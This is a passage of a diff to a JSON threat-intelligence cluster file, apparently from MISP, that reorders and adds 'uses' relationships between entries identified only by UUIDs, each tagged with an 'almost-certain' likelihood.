"35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -20494,7 +23076,14 @@ "type": "uses" }, { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20507,12 +23096,26 @@ ], "type": "uses" }, + { + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "8e101fdd-9f7f-4916-bb04-6bd9e94c129c", 
@@ -20534,6 +23137,48 @@ ] }, "related": [ + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ @@ -20548,34 +23193,6 @@ ], "type": "uses" }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ 
@@ -20589,20 +23206,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "53a42597-1974-4b8e-84fd-3675e8992053", @@ -20625,13 +23228,6 @@ ] }, "related": [ - { - "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ @@ -20639,6 +23235,20 @@ ], "type": "uses" }, + { + "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ @@ -20646,6 +23256,13 @@ ], "type": "uses" }, + { + "dest-uuid": "9e09ddb2-1746-4448-9cad-7f8b41777d6d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ @@ -20660,13 +23277,6 @@ ], "type": "uses" }, - { - "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", "tags": [ 
@@ -20681,20 +23291,6 @@ ], "type": "uses" }, - { - "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "tags": [ @@ -20703,7 +23299,7 @@ "type": "uses" }, { - "dest-uuid": "9e09ddb2-1746-4448-9cad-7f8b41777d6d", + "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20717,14 +23313,21 @@ "type": "uses" }, { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "dest-uuid": "53bfc8bf-8f76-4cd7-8958-49a884ddb3ee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "53bfc8bf-8f76-4cd7-8958-49a884ddb3ee", + "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -20758,14 +23361,35 @@ }, "related": [ { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20784,27 +23408,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "bfd2738c-8b43-43c3-bc9f-d523c8e88bf4", 
@@ -20827,21 +23430,7 @@ }, "related": [ { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20854,13 +23443,6 @@ ], "type": "uses" }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "519630c5-f03f-4882-825c-3af924935817", "tags": [ 
@@ -20869,49 +23451,7 @@ "type": "uses" }, { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -20924,12 +23464,75 @@ ], "type": "uses" }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "0817aaf2-afea-4c32-9285-4dcd1df5bf14", @@ -21006,13 +23609,6 @@ ], "type": "uses" }, - { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ 
@@ -21027,6 +23623,13 @@ ], "type": "uses" }, + { + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ @@ -21055,6 +23658,41 @@ ] }, "related": [ + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4ae4f953-fe58-4cc8-a327-33257e30a830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ @@ -21063,14 +23701,21 @@ "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4eeaf8a9-c86b-4954-a663-9555fb406466", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -21090,13 +23735,6 @@ ], "type": "uses" }, - { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", "tags": [ @@ -21104,34 +23742,6 @@ ], "type": "uses" }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4ae4f953-fe58-4cc8-a327-33257e30a830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ @@ -21140,21 +23750,7 @@ "type": "uses" }, { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -21168,28 +23764,14 @@ "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -21202,6 +23784,13 @@ ], "type": "uses" }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "tags": [ 
@@ -21210,21 +23799,49 @@ "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "4eeaf8a9-c86b-4954-a663-9555fb406466", + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -21250,20 +23867,6 @@ ] }, "related": [ - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ @@ -21272,7 +23875,7 @@ "type": "uses" }, { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -21285,6 +23888,20 @@ ], "type": "uses" }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "9b52fca7-1a36-4da0-b62d-da5bd83b4d69", "tags": [ @@ -21300,49 +23917,14 @@ "type": "uses" }, { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -21355,12 +23937,47 @@ ], "type": "uses" }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "92b55426-109f-4d93-899f-1833ce91ff90", @@ -21383,20 +24000,6 @@ ] }, "related": [ - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", "tags": [ 
@@ -21404,41 +24007,6 @@ ], "type": "uses" }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ 
@@ -21452,6 +24020,55 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "fb4e3792-e915-4fdd-a9cd-92dfa2ace7aa", 
@@ -21474,28 +24091,14 @@ }, "related": [ { - "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -21516,14 +24119,7 @@ "type": "uses" }, { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -21537,14 +24133,7 @@ "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -21557,20 +24146,6 @@ ], "type": "uses" }, - { - "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ 
@@ -21578,6 +24153,34 @@ ], "type": "uses" }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ @@ -21585,12 +24188,26 @@ ], "type": "uses" }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "5189f018-fea2-45d7-b0ed-23f9ee0a46f3", @@ -21640,14 +24257,7 @@ }, "related": [ { - "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -21661,7 +24271,7 @@ "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", "tags": [ 